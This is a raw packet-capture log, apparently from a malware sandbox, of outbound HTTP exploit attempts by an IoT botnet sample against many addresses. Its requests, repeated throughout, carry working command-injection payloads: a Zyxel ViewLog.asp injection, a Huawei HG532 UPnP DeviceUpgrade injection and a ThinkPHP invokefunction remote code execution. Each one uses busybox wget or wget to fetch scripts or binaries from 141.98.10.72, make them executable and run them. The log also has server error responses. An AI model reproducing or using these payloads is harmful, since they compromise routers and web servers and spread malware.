                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:57.122071981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:58.465924978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.377948046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:06.753818989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1297192.168.2.145520694.122.62.1978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.478277922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1298192.168.2.144578494.67.9.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.689914942 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:56.964340925 CET1286INHTTP/1.1 404 Not Found
                                                        Server: Mini web server 1.0 ZTE corp 2005.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        X-Content-Type-Options: nosniff
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f
                                                        Data Ascii: <html> <head><title>404 Not Found</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>404 Not Found</h2><span>The requested URL was not found on this server.</span><div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned o


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1299192.168.2.143908441.207.125.837215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.702752113 CET814OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1300192.168.2.145629495.100.232.21880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:57.210223913 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:57.419915915 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:57 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:57 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 36 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 37 35 37 26 23 34 36 3b 33 34 65 64 37 65 38 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;567e19b8&#46;1707899757&#46;34ed7e85</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1301192.168.2.145502695.166.233.15780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:57.217015028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1302192.168.2.144109895.164.251.17580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:57.227576017 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1303192.168.2.144287295.181.227.8580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:57.362054110 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:57.723083973 CET932INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 681
                                                        date: Wed, 14 Feb 2024 08:35:57 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1304192.168.2.145303488.99.186.5380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:57.411741018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:57.614268064 CET411INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:57 GMT
                                                        Server: Apache/2.4.18
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1305192.168.2.143994631.136.242.1738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.692703009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.321904898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.569818020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.193671942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.313523054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
